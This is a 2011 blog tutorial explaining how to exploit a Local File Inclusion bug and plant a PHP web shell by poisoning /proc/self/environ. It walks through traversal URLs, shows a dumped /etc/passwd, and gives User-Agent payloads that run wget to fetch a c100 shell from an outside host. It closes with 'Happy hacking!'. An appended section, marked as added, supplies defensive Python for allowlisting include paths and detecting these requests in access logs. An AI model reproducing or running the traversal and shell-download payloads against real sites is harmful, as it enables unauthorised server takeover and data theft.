How to plant a shell through LFI (Local File Inclusion) using the /proc/self/environ method
Writer: gunslinger_
In this tutorial I will explain how to create a shell on the target server through LFI using the /proc/self/environ method. OK, we just ...
1. Find a website that is vulnerable to LFI.
example: http://site.com/info.php?file=news.php
2. Replace "news.php" with "../../../".
example: http://site.com/info.php?file=../../../
We then get an error like the following:
Warning: include(../../../) [function.include]: failed to open stream: No such file or directory in /home/Gunslinger/public_html/info.php on line 99
OK, it looks like we have the opportunity to use include() on another file. Next, let's try to find /etc/passwd.
example: http://site.com/info.php?file=etc/passwd
But we still get an error like the following:
Warning: include(/etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/Gunslinger/public_html/info.php on line 99
What if we go up more directories? Let's try...
example: http://site.com/info.php?file=../../../../../../../../../etc/passwd
Ahoy, we managed to get the /etc/passwd file, which looks like the following:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:IRCd:/var/run/IRCd:/bin/sh
GNATS:x:41:41:GNATS Bug-Reporting System (admin):/var/lib/GNATS:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
hplip:x:103:7:HPLIP system user,,,:/var/run/hplip:/bin/false
avahi-autoipd:x:104:110:Avahi daemon AutoIP,,,:/var/lib/avahi-autoipd:/bin/false
gdm:x:105:111:Gnome Display Manager:/var/lib/gdm:/bin/false
saned:x:106:113::/home/saned:/bin/false
pulse:x:107:114:PulseAudio daemon,,,:/var/run/pulse:/bin/false
messagebus:x:108:117::/var/run/dbus:/bin/false
polkituser:x:109:118:PolicyKit,,,:/var/run/PolicyKit:/bin/false
avahi:x:110:119:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
haldaemon:x:111:120:Hardware abstraction layer,,,:/var/run/hald:/bin/false
Gunslinger:x:1000:1000:gunslinger_,,,:/home/Gunslinger:/bin/bash
snmp:x:112:65534::/var/lib/snmp:/bin/false
guest:x:113:124:Guest,,,:/tmp/guest-home.rRZGXM:/bin/bash
sshd:x:114:65534::/var/run/sshd:/usr/sbin/nologin
3. Let's check whether we can access /proc/self/environ. Now replace "/etc/passwd" with "/proc/self/environ":
example: http://site.com/info.php?file=../../../../../../../../../proc/self/environ
If you get something like this:
DOCUMENT_ROOT=/home/Gunslinger/public_html
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html,application/xml;q=0.9,application/xhtml+xml,image/png,image/jpeg,image/gif,image/x-xbitmap,*/*;q=0.1
HTTP_COOKIE=PHPSESSID=3g4t67261b341231b94r1844ac2ad7ac
HTTP_HOST=www.site.com
HTTP_REFERER=http://www.site.com/index.php?view=../../../../../../etc/passwd
HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15
PATH=/bin:/usr/bin
QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200
REMOTE_ADDR=6x.1xx.4x.1xx
REMOTE_PORT=35665
REQUEST_METHOD=GET
REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/Gunslinger/public_html/index.php
SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x
SERVER_ADMIN=gunslinger@site.com
SERVER_NAME=www.site.com
SERVER_PORT=80
SERVER_PROTOCOL=HTTP/1.0
SERVER_SIGNATURE=Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 OpenSSL/0.9.8k Server at www.site.com Port 80
then we can access /proc/self/environ! If you get a blank page, /proc/self/environ cannot be accessed, or the operating system may be *BSD.
4. Now let's inject malicious code by poisoning an HTTP header. How do we inject it? We can use the Tamper Data Firefox add-on, which you can download here: https://addons.mozilla.org/en-US/firefox/addon/966
Open Tamper Data in Firefox, then enter the /proc/self/environ URL from before, "http://site.com/info.php?file=../../../../../../../../../proc/self/environ", and fill in the User-Agent with the following code:
<? System ('wget-O http://r57.gen.tr/c100.txt shell.php');?>
or
<? Exec ('wget-O http://r57.gen.tr/c100.txt shell.php');?>
Then submit.
5. If the malicious code injection succeeded, the shell will be at a location like this:
http://site.com/shell.php
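The two defences whose absence this whole chain relies on, shown as an added example that is not part of the original post: a resolver for the ?file= parameter that rejects traversal and anything not on an allowlist (the check info.php lacks), and a scan over Apache combined-format access log lines for the traversal, /etc/passwd, /proc/self/environ and header-injection patterns left behind by steps 2 to 4. The include root, the allowlist and the log lines are constructed for the example and are not from the post.

```python
import re
import urllib.parse
from pathlib import Path

# ---- Mitigation: what info.php should do with ?file= before calling include() ----
INCLUDE_ROOT = Path("/home/Gunslinger/public_html/pages")  # assumed directory for includable pages
ALLOWED_PAGES = {"news.php", "about.php"}                   # constructed allowlist


def resolve_include(file_param: str, root: Path = INCLUDE_ROOT):
    """Return the path that may be included, or None to reject the request.

    Check 1: the name must be on the allowlist, so "../../etc/passwd" and
             "/proc/self/environ" never reach the filesystem at all.
    Check 2: the resolved path must still lie under root, so even an
             allowlist mistake (a name containing "..") cannot escape.
    """
    if file_param not in ALLOWED_PAGES:
        return None
    root_resolved = root.resolve()
    candidate = (root / file_param).resolve()
    try:
        candidate.relative_to(root_resolved)
    except ValueError:
        return None
    return candidate


# ---- Detection: flag the request patterns from the steps above in access logs ----
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def full_decode(value: str, rounds: int = 3) -> str:
    """URL-decode until stable, so %2F and double-encoded %252F both surface as '/'."""
    for _ in range(rounds):
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(rec: dict) -> list:
    """Return the reasons a parsed log record looks like an LFI / environ attempt."""
    reasons = []
    target = full_decode(rec["target"])
    if "../" in target or "..\\" in target:
        reasons.append("path traversal")
    if "/etc/passwd" in target:
        reasons.append("/etc/passwd read")
    if "/proc/self/environ" in target:
        reasons.append("/proc/self/environ read")
    # Header poisoning: a PHP open tag has no business in a User-Agent or Referer.
    for field, name in (("ua", "User-Agent"), ("referer", "Referer")):
        if "<?" in full_decode(rec[field]):
            reasons.append(f"PHP tag in {name}")
    return reasons


def scan_log(lines):
    """Parse Apache combined-format lines and return the suspicious ones with reasons."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or a different format: skip rather than crash
        rec = m.groupdict()
        reasons = classify(rec)
        if reasons:
            hits.append({"ip": rec["ip"], "time": rec["time"],
                         "target": rec["target"], "reasons": reasons})
    return hits


# Constructed sample log (not from the post): one normal request, then the
# probes that steps 2 to 4 of the tutorial would leave behind.
SAMPLE_LOG = """\
203.0.113.9 - - [17/Jul/2011:10:00:01 +0700] "GET /info.php?file=news.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [17/Jul/2011:10:00:07 +0700] "GET /info.php?file=../../../../../../../../../etc/passwd HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.9 - - [17/Jul/2011:10:00:15 +0700] "GET /index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 3072 "-" "<?php echo 'injected'; ?>"
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG.splitlines()):
        print(hit["ip"], hit["time"], hit["target"], "->", ", ".join(hit["reasons"]))
    print(resolve_include("news.php"))
    print(resolve_include("../../../../../../../../../etc/passwd"))
```

The allowlist is the check that actually matters: with it in place the include() call never sees attacker-chosen paths, so neither /etc/passwd nor /proc/self/environ can be reached whatever the traversal depth. The log scan decodes the request target before matching, because the environ dump above shows the traversal arriving as %2F-encoded segments that a naive substring match for "../" would miss.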
Happy hacking!
© 2011 My Blog is my style . All Rights Reserved.